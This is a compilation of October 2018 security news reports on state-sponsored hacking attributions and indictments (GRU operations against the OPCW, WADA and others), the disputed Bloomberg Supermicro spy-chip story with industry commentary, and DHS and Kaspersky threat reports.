In the last 24 hours: U.S. authorities charged seven officers from the GRU with hacking international agencies; British and Australian authorities accused the GRU of a devastating 2017 cyberattack on Ukraine, the email leaks that rocked the U.S. 2016 election and other damaging hacks; And Dutch officials alleged that GRU agents tried and failed to hack into the world's chemical weapons watchdog, the Organization for the Prohibition of Chemical Weapons.

The ham-handed attempted break-in — involving hacking equipment in the trunk of a car and a trail of physical and virtual clues — was the most stunning operation revealed Thursday. It was so obvious, in fact, that it almost looked like the Russians didn't care about getting caught.

"Basically, the Russians got caught with their equipment, people who were doing it, and they have got to pay the piper. They are going to have to be held to account," U.S. Defense Secretary James Mattis said in Brussels, where he was meeting with NATO allies.

Mattis said the West has "a wide variety of responses" available.

Britain's ambassador to the Netherlands, Peter Wilson, said the GRU would no longer be allowed to act with impunity.

Calling Russia a "pariah state," British Defense Secretary Gavin Williamson said: "Where Russia acts in an indiscriminate and reckless way, where they have done in terms of these cyberattacks, we will be exposing them."

Deputy Foreign Minister Sergei Ryabkov of Russia said in a statement that the U.S. is taking a "dangerous path" by "deliberately inciting tensions in relations between the nuclear powers," adding that Washington's European allies should also think about it.

While the accusations expose how much damage Russia can do in foreign lands, through remote hacking and on-site infiltration — they also expose how little Western countries can do to stop it.

Russia is already under EU and U.S. sanctions, and dozens of GRU agents and alleged Russian trolls have already been indicted by the U.S but will likely never be handed over to face American justice.

Still, to the Western public, Thursday may have been a pivotal day, with accusations so extensive, and the chorus of condemnation so loud, that it left little doubt of massive Russian wrongdoing. A wealth of surveillance footage released by Western intelligence agencies was quickly and overwhelmingly confirmed by independent reporting.

The litany of accusations of GRU malfeasance began overnight, when British and Australian authorities accused the Russian agency of being behind the catastrophic 2017 cyberattack in Ukraine. The malicious software outbreak knocked out ATMs, gas stations, pharmacies and hospitals and, according to a secret White House assessment recently cited by Wired, caused $10 billion in damage worldwide.

The British and Australians also linked the GRU to other hacks, including the Democratic Party email leaks and online cyber propaganda that sowed havoc before Americans voted in the 2016 presidential election.

Later Thursday, Dutch defense officials released photos and a timeline of GRU agents' botched attempt to break into the chemical weapons watchdog using Wi-Fi hacking equipment hidden in a car parked outside a nearby Marriott Hotel. The OPCW was investigating a nerve agent attack on a former GRU spy, Sergei Skripal, and his daughter in Salisbury, England, that Britain has blamed on the Russian government. Moscow vehemently denies involvement.

Photographs released by the Dutch Ministry of Defense showed a trunk loaded with a computer, battery, a bulky white transformer and a hidden antenna; officials said the equipment was operational when Dutch counterintelligence interrupted the operation.

What Dutch authorities found seemed to be the work of an amateur. A taxi receipt in the pocket of one of the agents showed he had hired a cab to take him from a street next to GRU headquarters to Moscow's Sheremetyevo Airport. A laptop found with the team appeared to tie them to other alleged GRU hacks.

The men were expelled instead of arrested, because they were traveling on diplomatic passports.

The Dutch also accused the GRU of trying to hack investigators examining the 2014 downing of a Malaysian Airlines jetliner over eastern Ukraine that killed all 298 people on board. A Dutch-led team says it has strong evidence the missile that brought the plane down came from a Russia-based military unit. Russia has denied the charge.

Later Thursday, the U.S. Justice Department charged seven GRU officers — including the four caught in The Hague — in an international hacking rampage that targeted more than 250 athletes, a Pennsylvania-based nuclear energy company, a Swiss chemical laboratory and the OPCW.

The indictment said the GRU targets had publicly supported a ban on Russian athletes in international sports competitions and because they had condemned what they called a state-sponsored doping program by Russia.

U.S. prosecutors said the Russians also targeted a Pennsylvania-based nuclear energy company and the OPCW.

The seven were identified as: Aleksei Morenets, 41; Evgenii Serebriakov, 37; Ivan Yermakov, 32; Artem Malyshev, 30; and Dmitriy Badin, 27; who were each assigned to Military Unit 26165, and Oleg Sotnikov, 46, and Alexey Minin, 46, who were also GRU officers.

The U.S. indictment says the hacking was often conducted remotely. If that wasn't successful, the hackers would conduct "on-site" or "close access" hacking operations, with trained GRU members traveling with sophisticated equipment to target their victims through Wi-Fi networks.

The World Anti-Doping Agency, the U.S. Anti-Doping Agency and the Canadian anti-doping agency were all identified by the U.S. indictment against the Russians.

WADA said the alleged hackers "sought to violate athletes' rights by exposing personal and private data — often then modifying them — and ultimately undermine the work of WADA and its partners in the protection of clean sport."

Travis Tygart, the CEO of the U.S. anti-doping agency and a prominent critic of Russian athletes' drug use, says "a system that was abusing its own athletes with an institutionalized doping program has now been indicted for perpetrating cyberattacks on innocent athletes from around the world."

Russia denied everything.

Konstantin Kosachev, the head of the foreign affairs committee in the upper house of Russian parliament, said the accusations were fake and intended to "delegitimize" a resurgent Russia. The West has picked up the GRU as "a modern analogue of the KGB which served as a bugaboo for people in the West during the Cold War," he said.

Russia countered with accusations of their own: The Defense Ministry unveiled complex allegations that the U.S. has a clandestine biological weapons lab in the country of Georgia as part of a network of labs on the edges of Russia and China that flout international rules.

Pentagon spokesman Eric Pahon called the accusations "an invention" and "obvious attempts to divert attention from Russia's bad behavior on many fronts."

The Associated Press, meanwhile, independently corroborated information that matches details for two of the alleged Russian agents named by the Dutch authorities.

An online car registration database in Russia showed that Aleksei Morenets, whose full name and date of birth are the same as one of the expelled Russians, sold his car in 2004, listing the Moscow address where the Defense Ministry's Military University is based.

Alexey Minin, another Russian whose full name and date of birth match the Dutch details, had several cars, including an Alfa Romeo, that were registered and sold at the address where the Defense Ministry's GRU school is located. In some of the filings, Minin listed the official military unit number of the GRU school as his home address.

Industry Reactions to Chinese Spy Chips: Feedback Friday
7.10.2018 securityweek

Bloomberg reported this week that the Chinese government planted tiny chips in Super Micro servers to spy on Amazon, Apple and tens of other important organizations in the United States.

The spy chips allegedly made it into devices made by California-based Super Micro after Chinese agents masquerading as government or Super Micro employees pressured or bribed managers at the Chinese factories where the motherboards are built.

Once the chips were planted, they would reportedly allow attackers to remotely access the compromised devices. According to Bloomberg, the operation was conducted by the Chinese military and it targeted over 30 organizations, including government agencies and tech giants. Amazon, Apple and Super Micro have all denied the allegations.

Experts comment on reports that China used tiny chips to spy on US tech giants

Industry professionals contacted by SecurityWeek have commented on various aspects of the story, including the technical details, political impact, and how organizations can defend themselves against such attacks.

And the feedback begins...

Ian Pratt, co-founder and president, Bromium:

"From the publicly available information it sounds like the implant was intended to compromise the Baseboard Management Controller (BMC) that is present on most server hardware to allow remote management over a network. The BMC has a lot of control over the system. It can provide remote keyboard/video/mouse access to the system over the network. It also typically has access to lots of information about the host, such as its name, domain, IP addresses etc, and can query other information from the host via SNMP. The BMC can also be used to upgrade or modify the firmware used by the main CPU and Management Engine (ME), providing a great scope for stealthy malfeasance.

Based on the photographs, the device appears to be an SPI bus interposer, which would be inserted into the SPI bus between the BMC and the flash memory chip it boots from. A serial interface like SPI is very convenient for this purpose as it requires few pins (6), and hence a small and unobtrusive chip can be used. The implant likely contains a small firmware image that is served up to the BMC when it boots, in preference to the real firmware. Once that special image is running on the BMC, it likely puts the implant into pass-through mode and then loads the real firmware, but the special implanted code will stay resident within the BMC, controlling its actions.

It is likely that the implant would have had very limited functionality built directly into it. It would rely on communicating over the internet to a command and control server where it would report information about the machine it was resident on (such as the domain and network), and then receive instructions. I would expect/guess that out of the box it could have enabled the remote video/keyboard to the attacker, and would have been able to download additional code modules that it could store in BMC flash and use for other kinds of exploitation.

This communication with the C&C server is vulnerable to observation, and is quite likely how the implant was discovered -- rather more probable than someone spotting the tiny extra chip.”

Jack Jones, Co-Founder and Chief Risk Scientist, RiskLens:

“We all know that the Chinese have been persistent in their campaigns to steal intellectual property and government intelligence through digital infiltration. We’ve also always known that hardware backdoors are a potential vector for this activity. In fact, many information security professionals have been warning of this for years. Why then, have companies and government agencies continued to purchase vast amounts and varieties of technologies from China?

If we put ourselves in the shoes of a business executive or agency head the answer is fairly obvious — cost savings. They have limited resources with which to achieve their objectives. Yes, their security team may have whispered (or shouted) in their ear of the dangers, but our profession has long suffered from a Chicken Little image. After a while, the myriad “high risks” all start to become an abstract blur in an executive’s mind — as opposed to the clarity of, for example, a 10% lower price with a Chinese product. What decision-makers haven’t had is a way to appropriately weigh these cost saving decisions against the risk implications.

Obviously, while the jury is still out (in some people’s minds) about the veracity and effect of this latest Chinese incursion, it should still serve as a wake-up call. We have to do a much better job of defining, evaluating and communicating loss event scenario probabilities and impacts so that decision-makers can make better-informed decisions. It shouldn’t take a digital "bullet to the knee" before exposures like this are taken seriously.”

Brian Vecci, Technical Evangelist, Varonis:

“This attack is about as surprising as catching Cookie Monster with his hand in the cookie jar. Compromising digital assets has become industrialized with advanced threats’ careful planning and organization. These threat actors are playing a long game with pre-attacks like these that position themselves for devastating attacks down the road– they are testing their abilities and an organization’s vulnerabilities to see how far they can go. What is surprising is that it has only taken decade or two for the digital world to become so inter-dependent – not just with hardware but with software -- today many systems have so much code in common that any upstream compromise is a widespread threat.
Yes, executives at top companies should be concerned, but they should have been concerned yesterday. CISO’s should operate under the assumption that they have live vulnerabilities on their network at all times because chances are they either have their own Edward Snowden on their hands or are exposed to external adversaries ranging from a basement script kiddie to a nation state-sponsored APT. Monitoring, both deeply and broadly, and useful security analytics that combine different data sources are the only way these kinds of threats will ever be detected or controlled. Companies have to start understanding that they can't sit around and patch their way to a secure network. On a positive note, now that this vulnerability has been detected, it’s going to get harder to fly under the radar because companies will know what to look for.”

Sanjay Beri, CEO, Netskope:

“Chinese cyber infiltration is nothing new, as proven by ongoing recent attacks from elite Chinese institutions diligently working to gain access to assets from the west. Today’s news proves that it’s clear we have exited the honeymoon period created by the deal President Obama struck with President Xi Jinping in back in 2015, where the two pledged that each of their governments would refrain from targeted cyber attacks toward another for commercial gain.

As economic tensions continue to escalate between nation states and the US, organizations -- especially those operating in high-risk sectors such as energy, manufacturing, government, etc. -- need to remain watchful and on high-alert in order to ensure their sensitive data is protected and inaccessible to foreign entities. Given the nature of this attack was at the hardware level, there are bound to be even more complex ramifications of those affected, as these types of breaches are far less simple to rectify than those at the software level.”

Itzik Kotler, CTO and Co-Founder, SafeBreach:

“Like many recent attacks, this is low-level, stealthy, and widespread. The combination of these three makes it especially frightening at first, and it certainly is rare to see such an attack in the wild.

However, no attack is ever a "one and done" operation. Even a compromised server isn't, by itself, a success for an attacker. Stolen data always needs to be retrieved. Or that server needs to be used to download, install, or run further attacks. It's for these reasons that enterprises employ layered defense, or "defense in depth" strategies that try to stop attacks at various points throughout their environment.

We must assume that no security, at any point, is 100% effective - and this attack is just another example. However, with the right layered defense, validated to ensure it's working as intended, even something like a hardware attack doesn't end up becoming a single point of failure.”

Dave Weinstein, VP Threat Research, Claroty:

“While the denials from Apple and Amazon have been relatively unprecedented in their strength and specificity, the reality is that the supply chain – for everything from consumer products, to technology, to heavy machinery – has been a perpetual source of concern for many years as a morass of potential exposure, and one that renders most security tools obsolete.

Regardless of where the claims of the story shake out, there are two immutable facts. First, we have a preponderance of evidence that supply chain compromise is not only possible at multiple levels, it’s happening. Second, China has proven its willingness pursue advantage by any means necessary, and as the world's de-facto factory of IT components, this is the “high ground” advantage that they are willing to exploit. Likely even more willing given recent developments in trade policy between the U.S. and China.”

Rick Moy, Chief Marketing Officer at Acalvio:

"While there’s a lot of denial about the attacks, it’s completely plausible that China did in fact seed certain hardware with these backdoor chips. One can imagine the liabilities that firms would rather not take on by admitting this kind of a breach. However, it is entirely within the capabilities and mission scope of nation state intel armies to infiltrate supply chains in this way. Although, the ramifications are more serious than embedding malicious software because they could bring wholesale sanctions against the vendors in question, which is what we have been seeing on an informal basis for a while now."

Joseph Carson, chief security scientist at Thycotic:

“We are one step away from a major cyber conflict or retaliation that could result in serious implications. This could be one of the biggest hacks in history. What is clear is that it is a government behind this cyber espionage and I believe it is compromised employees with privileged access that are acting as malicious insiders selecting specific targets so the supply chain has been victim of being compromised. The motive will not be clear until exact details of the hardware chip is reversed to know what it is capable of and who are the victims since no one is owning up from any of the Super Micro’s customers.

It is too early to tell until more evidence is made transparent and any victims own up to this. What is clear is that Super Micro must conduct an Incident Response to determine the actual evidence behind these allegations so that transparency and a motive is revealed and that the nation state behind such compromise can be held responsible.”

Malcolm Harkins, Chief Security and Trust Officer, Cylance:

“Unfortunately the only surprising element about this attack is that it’s taken so long to be uncovered in a report. Supply chain compromise has been a concern for a long time, and there are multiple nation states with endless motivations who make attacks of this scale a certainty rather than a probability.

Adversaries have a wealth of choices of how to execute. From leaving extra bits in software to compromising a validation engineer, the options are endless if the threat actor has the time, money, and capacity. Organizations must combat this by remaining vigilant about where the hardware and software has been. Some software such as the BIOS and firmware is often written by external sources and not the hardware manufacturer. If you have a distrust for the location that it is being created, or uncertain about the security validation performed then you need to implement additional validation or in some case different validation. Evident by Meltdown/Spectre, the hardware industry including the semiconductor industry has historically validated technology by testing for the functionality they want to see exist rather than exploring potentially dangerous alternatives that can create harm. Simply put, companies are essentially testing a light switch to see if it turns on and off when it goes up and down, but they’re ignoring the implications of switching it left and right.

Historically speaking, this level of testing has not been done because nobody has demanded it. Extra validation costs extra dollars and slows down time to market. Similar to age old Ford Pinto case, organizations are looking at business risks to themselves rather than the risk to the computing ecosystem and therefore society. Until this way of thinking changes, we will continue to see the potential for nation-state exploits such as this one.”

Tim Bandos, Vice President, Cybersecurity, Digital Guardian:

“The fact that China manufactures many of the components that go into servers, it would be relatively simple to install and disguise a hidden chip enabling backdoor communications and control with those endpoints. Also, given where these chips reside – lower in the stack – most technologies such as EDR and AV have a visibility gap and wouldn't be able to identify anything being tampered with at the hardware-level. This (once again) demonstrates that determined adversaries have capabilities exceeding that of defenders; hopefully, this will inspire the development of methods and techniques to detect when hardware tampering has taken place. Until then, diversifying supply chain vendors and staying vigilant on outbound and inbound network traffic is highly advised.”

Neelima Rustagi, Senior Director, Product Management, Demisto:

"Although the veracity of the accusations has yet to be confirmed, it highlights a couple of worrying security trends. Firstly, no abstraction layer is safe from attack. While intrusions on the application, OS, and software layer are more visible and get talked about more, attacks that exploit hardware such as the recent Foreshadow attack can be tougher to spot for security tools. Secondly, organizations need to think of ‘supply chain security’ in addition to product/network security. Since product manufacture today straddles across nations and industries – each with their own regulations, mores, and political climates – organizations should be cognizant of processes, vendor relationships, and regulatory requirements for each step of the product lifecycle."

DHS Warns of Threats to Precision Agriculture
7.10.2018 securityweek

Relying on various embedded and connected technologies to improve agricultural and livestock management, precise agriculture is exposed to vulnerabilities and cyber-threats, a new report from the United States Department of Homeland Security (DHS) warns.

The adoption of precision agriculture technology has increased, which has also introduced various cyber risks. By exploiting vulnerabilities in precision agriculture technologies, an attacker could not only access sensitive data and steal resources, but also tamper with or destroy equipment.

Technologies used in precision agriculture “rely on remote sensing, global positioning systems, and communication systems to generate big data, data analytics, and machine learning,” the DHS report (PDF) says.

The findings of the report stem from visits and interviews at large farms and precision agriculture technology manufacturers in the United States. Technologies that allow for a more precise application of agricultural and livestock management inputs (fertilizer, seeds, and pesticides) to lower costs and improved yields, also expose the agricultural sector to vulnerabilities, the paper reads.

Cyber threats facing precision agriculture’s embedded and digital tools, however, are consistent with those other connected industries are exposed to as well. The malicious attacks targeting these tools usually have the same purpose too, including data and resource theft, reputation loss, destruction of equipment, or gaining an improper financial advantage over a competitor.

“Therefore, improper use of USB thumb drives, spear-phishing, and other malicious cyber-attacks, are readily available threat vectors for an attack; and the generally accepted mitigation techniques in other industries are largely sufficient for creating a successful defense-in-depth strategy for precision agriculture,” the report notes.

What makes precision agriculture unique, however, is the fact that a highly mechanical labor-intensive industry is now connected online, which dramatically increases the attack surface for threat actors. Thus, threats that would otherwise be viewed as common, “may have unique and far-reaching consequences on the agricultural industry,” the DHS says.

According to the report, precision agriculture isn’t only exposed to cyber-attacks, but also faces dangers such as natural disasters, terrorist attacks, equipment breakdown, or insider threats.

Key threats to the sector include intentional theft of data, intentional publishing of confidential information, access to unmanned aerial system (UAS) data, sale of confidential data, falsification of data for disruption purposes, introduction of rogue data to damage a crop or herd, disruption to positioning, navigation, and timing (PNT) systems, and disruption to communication networks.

The report also reveals a series of key controls designed to mitigate the threats: email and browser protections, control over network ports and hardware and software assets, account monitoring, data recovery capabilities, data protection, and incident response and management, among other.

“Adoption of information security standards for precision agriculture is important for the future success of precision agriculture, along with industry efforts for equipment interoperability and data use / privacy. Vetted best practices, borne from hard experience learned in other sectors which have proceeded agriculture in the digital revolution, offer a proven path for data security,” the report reads.

Russian State-Sponsored Operations Begin to Overlap: Kaspersky
7.10.2018 securityweek

Kaspersky Lab security researchers have uncovered new evidence that shows overlaps between the activity of infamous Russian cyber-espionage groups Turla and Sofacy.

Earlier this year, Kurt Baumgartner, principal security researcher, Kaspersky Lab, revealed that activity associated with the Sofacy group, which is also known as APT28, Fancy Bear, Pawn Storm, Sednit and Strontium, appeared to overlap with that of other state-sponsored operations.

The researcher said at the time that Sofacy’s Zebrocy malware had been discovered on machines also infected with Mosquito, a backdoor previously associated with Turla. The shared victims included organizations in Europe and Asia.

Amid an evolution in the tactics, techniques and procedures (TTPs) employed by the Turla group, also tracked as Snake, Venomous Bear, Waterbug, and Uroboros, Kaspersky Lab has observed further connections with Sofacy, as well as more evidence linking Turla to WhiteBear.

Specifically, the security researchers discovered that Turla’s KopiLuwak malware is employing a delivery mechanism that uses code nearly identical to that previously seen in the Zebrocy operation.

As part of the attack, Turla employed a new spear-phishing delivery vector, relying on Windows shortcut (.LNK) files for malware delivery. The LNK file, Kaspersky discovered, contained PowerShell code almost identical to that used in Zebrocy activity a month earlier.

The investigation also uncovered target overlaps between the two threat actors, focused on sensitive political targets, including government research and security entities, diplomatic missions and military affairs, mainly in central Asia.

The KopiLuwak malware isn’t new, being first associated with the Turla hackers nearly two years ago. In mid-2018, however, the threat actor started using an evolved variant of the malware, targeting entities in Syria and Afghanistan.

KopiLuwak emerged in 2016 as an evolution from IcedCoffee, Turla’s first foray into full-fledged JavaScript backdoors. Focusing on European governments but more selectively deployed, KopiLuwak performs comprehensive system and network reconnaissance, can run arbitrary system commands and uninstalls itself and leaves little evidence for investigators to work with.

In a newly published report, Kaspersky details the discovery and also provides information on the evolution of the KopiLuwak JavaScript backdoor, along with details on the changes observed in the group’s Carbon framework and in the Meterpreter and Mosquito malware delivery techniques.

Turla is expected to continue to update and use the Carbon framework code into 2019 within Central Asia and related remote locations. The group is also expected to use open-source based or inspired fileless components and memory loaders from the Mosquito malware, Kaspersky says.

“It’s very interesting to see ongoing targeting overlap, or the lack of overlap, with other APT activity. Noting that Turla was absent from the milestone DNC hack event where Sofacy and CozyDuke were both present, but Turla was quietly active around the globe on other projects, provides some insight as to ongoing motivations and ambitions of this group,” Kaspersky notes.

US DoJ indicted 7 Russian Intelligence officers for attacking Anti-Doping Organizations
6.10.2018 securityaffairs 

US DoJ indicted seven defendants working for the Russian Main Intelligence Directorate (GRU), for hacking, wire fraud, identity theft, and money laundering.
The news of the day is that a US DoJ indicted seven defendants working for the Russian Main Intelligence Directorate (GRU), for hacking, wire fraud, identity theft, and money laundering.

The defendants are Aleksei Sergeyevich Morenets, Evgenii Mikhaylovich, Serebriakov, Ivan Sergeyevich Yermakov, Artem Andreyevich Malyshev, and Dmitriy Sergeyevich Badin, who work for the Military Unit 26165, and GRU officers Oleg Mikhaylovich Sotnikov and Alexey Valerevich Minin.

The hackers were involved in a cyber operation aimed at discrediting the international anti-doping organizations and officials that revealed athlete doping program sustained by Moscow.

The GRU officers hacked into the accounts of officials at the anti-doping organizations to steal confidential data and spread them to and delegitimize them.

According to prosecutors, defendants also attempted to spread the fake news on doping programs followed by athletes from other countries.

“According to the indictment, beginning in or around December 2014 and continuing until at least May 2018, the conspiracy conducted persistent and sophisticated computer intrusions affecting U.S. persons, corporate entities, international organizations, and their respective employees located around the world, based on their strategic interest to the Russian government.” reads the DoJ press release.

“State-sponsored hacking and disinformation campaigns pose serious threats to our security and to our open society, but the Department of Justice is defending against them,” said Attorney General Jeff Sessions. “Today we are indicting seven GRU officers for multiple felonies each, including the use of hacking to spread the personal information of hundreds of anti-doping officials and athletes as part of an effort to distract from Russia’s state-sponsored doping program. The defendants in this case allegedly targeted multiple Americans and American entities for hacking, from our national anti-doping agency to the Westinghouse Electric Company near Pittsburgh. We are determined to achieve justice in these cases and we will continue to protect the American people from hackers and disinformation.”
The Russian state-sponsored hackers have spread fake news via social media accounts and other infrastructure acquired and maintained by GRU Unit 74455 in Russia.

The cyber spies were operating under the name of a false hacktivist group calling itself the “Fancy Bears’ Hack Team.”

“As part of its influence and disinformation efforts, the Fancy Bears’ Hack Team engaged in a concerted effort to draw media attention to the leaks through a proactive outreach campaign,” continues the press release.

“The conspirators exchanged e-mails and private messages with approximately 186 reporters in an apparent attempt to amplify the exposure and effect of their message.”

The indictments of the seven GRU members is the latest in a string of similar actions against Russian agents involved in hacking activities.

In July, the special Counsel Robert Mueller, who indicted on February 13 Russians for a massive operation aimed to influence the 2016 Presidential election, charged 12 Russian intelligence officers working under the GRU of carrying out “large-scale cyber operations” to steal Democratic Party documents and emails.

DHS issued an alert on attacks aimed at Managed Service Providers
6.10.2018 securityaffairs 

The United States Department of Homeland Security (DHS) is warning of ongoing activity from an advanced persistent threat (APT) actor targeting global managed service providers (MSPs).
The DHS issued an alert on ongoing attacks aimed at global managed service providers (MSPs) that are carried out by an advanced APT group.

Managed services is the practice of outsourcing on a proactive basis certain processes and functions intended to improve operations and cut expenses. It is an alternative to the break/fix or on-demand outsourcing model where the service provider performs on-demand services and bills the customer only for the work done.

The use of MSP is increasing the attack surface for attackers, the DHS’ alert TA18-276B, is related to activity that was uncovered by DHS’ National Cybersecurity and Communications Integration Center (NCCIC) in April 2017.

“The National Cybersecurity and Communications Integration Center (NCCIC) is aware of ongoing APT actor activity attempting to infiltrate the networks of global managed service providers (MSPs).” reads the alert issued by DHS.

“Since May 2016, APT actors have used various tactics, techniques, and procedures (TTPs) for the purposes of cyber espionage and intellectual property theft. APT actors have targeted victims in several U.S. critical infrastructure sectors, including Information Technology (IT), Energy, Healthcare and Public Health, Communications, and Critical Manufacturing.”

Security firms attributed the attacks to a Chinese threat actor referred as APT10 (aka menuPass and Stone Panda).

managed service

The group has been active at least since 2009, in April 2017 experts from PwC UK and BAE Systems uncovered a widespread hacking campaign, tracked as Operation Cloud Hopper, targeting managed service providers (MSPs) in multiple countries worldwide.

In July 2018, FireEye observed a series of new attacks of the group leveraging spear-phishing emails using weaponized Word documents that attempt to deliver the UPPERCUT backdoor, also tracked as ANEL.

The ANEL malware was already seen in the previous attack as a beta version or release candidate. In September, researchers from FireEye uncovered and blocked a campaign powered by the Chinese APT10 cyber espionage group aimed at Japanese media sector

The hackers used a broad range of malware in their campaigns, including PlugX RAT, ChChes, Quasar, RedLeaves, the UPPERCUT backdoor, NetTraveler, and ZeroT.

DHS alert also provides technical information on detection, response and mitigation for this specific threat.

China planted tiny chips on US computers for cyber espionage

5.10.2018 securityaffairs BigBrothers

China used tiny chips implanted on computer equipment manufactured for US companies and government agencies to steal secret information.
According to a report published by Bloomberg News, China used tiny chips implanted on computer equipment manufactured for US companies and government agencies, including Amazon and Apple, to steal secret information.

The tiny chips have a size of a grain of rice, they were discovered after an investigation that is still ongoing and that that started three years ago.

“Nested on the servers’ motherboards, the testers found a tiny microchip, not much bigger than a grain of rice, that wasn’t part of the boards’ original design. Amazon reported the discovery to U.S. authorities, sending a shudder through the intelligence community.” reads the report.

tiny chips spy China

The tiny chips were used as a “stealth doorway” into computer equipment, a hardware backdoor very hard to detect.

According to unnamed US officials cited in the report, the spying hardware was designed by a unit of the People’s Liberation Army and was inserted on equipment manufactured in China for US-based Super Micro Computer Inc.

Amazon discovered the tiny chips when it acquired software firm Elemental and conducted a security assessment of equipment made for Elemental by California-based Supermicro.

Elemental manufactured equipment for Department of Defense data centers, the CIA’s drone operations, and onboard networks of Navy warships.

“Elemental also started working with American spy agencies. In 2009 the company announced a development partnership with In-Q-Tel Inc., the CIA’s investment arm, a deal that paved the way for Elemental servers to be used in national security missions across the U.S. government.” continues the report.

“Public documents, including the company’s own promotional materials, show that the servers have been used inside Department of Defense data centers to process drone and surveillance-camera footage, on Navy warships to transmit feeds of airborne missions, and inside government buildings to enable secure videoconferencing. NASA, both houses of Congress, and the Department of Homeland Security have also been customers. This portfolio made Elemental a target for foreign adversaries.”

The tiny chips were designed to be implanted directly on the motherboards, the backbone for computer equipment used in data centers of the major US firms.

Amazon confirmed that it was not aware of the supply chain compromise.

“It’s untrue that AWS knew about a supply chain compromise, an issue with malicious chips, or hardware modifications when acquiring Elemental,” Amazon wrote.

Apple denied having found the spy chips on his equipment.

“On this we can be very clear: Apple has never found malicious chips, ‘hardware manipulations’ or vulnerabilities purposely planted in any server,” Apple wrote.

Canada Says it Was Targeted by Russian Cyber Attacks
5.10.2018 securityaffairs

Canada said Thursday it too was targeted by Russian cyber attacks, citing breaches at its center for ethics in sports and at the Montreal-based World Anti-Doping Agency, after allies blamed Moscow for some of the biggest hacking plots of recent years.

"The government of Canada assesses with high confidence that the Russian military's intelligence arm, the GRU, was responsible" for these cyber attacks, the foreign ministry said in a statement.

Ottawa said these formed "part of a broader pattern of activities by the Russian government that lie well outside the bounds of appropriate behavior, demonstrate a disregard for international law and undermine the rules-based international order."

And it called on "all those who value this order to come together in its defence."

Allies accused Russia military intelligence of being behind an April attempt to gain access to official networks of the Organisation for the Prohibition of Chemical Weapons (OPCW).

The Netherlands expelled four alleged agents and Britain and Australia pointed fingers at Russian military intelligence, while the United States charged seven Russian agents with hacking the World Anti-Doping Agency (WADA) in 2016.

The Russia-based Fancy Bears computer hacking group leaked athletes' medical records held by WADA, said the agency.

The same year, the Canadian Centre for Ethics in Sport was "compromised by malware enabling unauthorized access to the Centre's network," the foreign ministry said.

WADA has faced a backlash over its decision last month to lift a ban on Russia's anti-doping agency.

The agency had suspended RUSADA in November 2015 after declaring it non-compliant following revelations of a vast state-backed scheme to avoid drug testers.

A WADA report by Canadian lawyer Richard McLaren accused Russian authorities of running an elaborate doping program with the full support of the Russian Ministry of Sport and the Russian secret service (FSB).

The softening of WADA's stance triggered outrage from athletes and national anti-doping agencies around the world, who have accused WADA of succumbing to pressure from the IOC.

US to Let NATO Use its Cyber Defense Skills
5.10.2018 securityaffairs

The United States is expected to make its offensive cyber warfare capabilities available to NATO, officials said Wednesday, as the alliance seeks to strengthen its defenses against Russian electronic attacks.

Britain and Denmark have already publicly committed cyber resources to NATO, and Washington is expected to announce that it will follow suit on Thursday at a meeting of defence ministers in Brussels.

Alliance chief Jens Stoltenberg said cyber attacks on NATO countries were becoming "more frequent... more sophisticated... more coercive" and any contribution of cyber capabilities was welcome.

"We see cyber being used to meddle in domestic political processes, attacks against critical infrastructure, and cyber will be an integral part of any future military conflict," Stoltenberg said.

The three Baltic states -- Lithuania, Latvia and Estonia -- say they come under near-daily cyber assault, with government departments, banking systems and the power grid coming in for attack, and point the finger at former Soviet ruler Russia.

Moscow is also blamed for interfering in various European elections through campaigns of disinformation on social media.

Most recently, Washington accused Russia of leading a disinformation campaign in Macedonia through social media to discourage voters from taking part in last weekend's referendum on changing the country's name.

The name change is crucial to Macedonia's hopes of joining NATO -- a step Moscow opposes.

Canada blames Russia for cyber attacks against its structures
5.10.2018 securityweek

The Government of Canada blamed the GRU, the Russian military’s intelligence agency, for cyber attacks at the Montreal-based World Anti-Doping Agency.
“The government of Canada assesses with high confidence that the Russian military’s intelligence arm, the GRU, was responsible” for these cyber attacks, the foreign ministry said in a statement.

[cyber attacks are] “part of a broader pattern of activities by the Russian government that lie well outside the bounds of appropriate behavior, demonstrate a disregard for international law and undermine the rules-based international order.”

“all those who value this order to come together in its defence.”

Canada and its allies accused Russia of its aggressive cyber strategy that continuously attempts to interfere in the politic of foreign states. The allies

Allies blamed the Kremlin of being responsible for cyber attacks that an April aimed at the official networks of the Organisation for the Prohibition of Chemical Weapons (OPCW).

In September the Dutch-based NRC newspaper and Swiss daily Tages-Anzeiger reported the Dutch intelligence services arrested two alleged Russian spies working for Russia’s GRU military intelligence service on suspicion of planning to hack the Spiez laboratory near Bern.

The laboratory conducts investigations for a global chemical arms watchdog, the Organisation for the Prohibition of Chemical Weapons (OPCW), its researchers were investigating the poisoning of agent Sergei Skripal and his daughter in Salisbury.

The two agents carried equipment to hack into the network of the laboratory to spy on the activity of its researchers.

The Netherlands expelled four alleged agents, while the United States charged seven Russian agents with hacking the World Anti-Doping Agency (WADA) in 2016.

The foreign ministry added that in the same period the Canadian Centre for Ethics in Sport was “compromised by malware enabling unauthorized access to the Centre’s network,”

Britain and Australia also accused the Russian military intelligence of running a massive espionage campaign.

UK, Australia Blame Russia for Bad Rabbit, Other Attacks
5.10.2018 securityweek

The United Kingdom and Australia have officially blamed Russia for several high profile attacks, including the Bad Rabbit ransomware campaign.

A statement published by the U.K. government on Wednesday reveals that the country’s National Cyber Security Centre (NCSC) has linked several cyber threat actors to Russia’s GRU military intelligence service.

The NSCS believes that the GRU is behind the groups tracked by various security firms as APT28, Fancy Bear, Pawn Storm, Sofacy, Sednit, Cyber Caliphate, Cyber Berkut, BlackEnergy, Voodoo Bear, Strontium, Tsar Team and Sandworm. While many of these names represent the same threat actor, the line between the operations carried out by various Russian groups often gets blurred, as shown by the recent VPNFilter attack.

The NCSC says that the GRU is “almost certainly” responsible for the Bad Rabbit ransomware attack in October 2017, the August 2017 attack on the World Anti-Doping Agency (WADA), the 2016 attack on the U.S. Democratic National Committee (DNC), and an attack on a small TV station in the UK in the summer of 2015. It’s worth noting that the U.S. has previously accused Russia of election-related hacks and even charged 12 intelligence officers.

“The GRU’s actions are reckless and indiscriminate: they try to undermine and interfere in elections in other countries; they are even prepared to damage Russian companies and Russian citizens. This pattern of behaviour demonstrates their desire to operate without regard to international law or established norms and to do so with a feeling of impunity and without consequences,” said British Foreign Secretary Jeremy Hunt. “Our message is clear: together with our allies, we will expose and respond to the GRU’s attempts to undermine international stability.”

The Australian government has accused Russia’s GRU for the same attacks, but admitted that Australia itself was not significantly impacted by any of the campaigns.

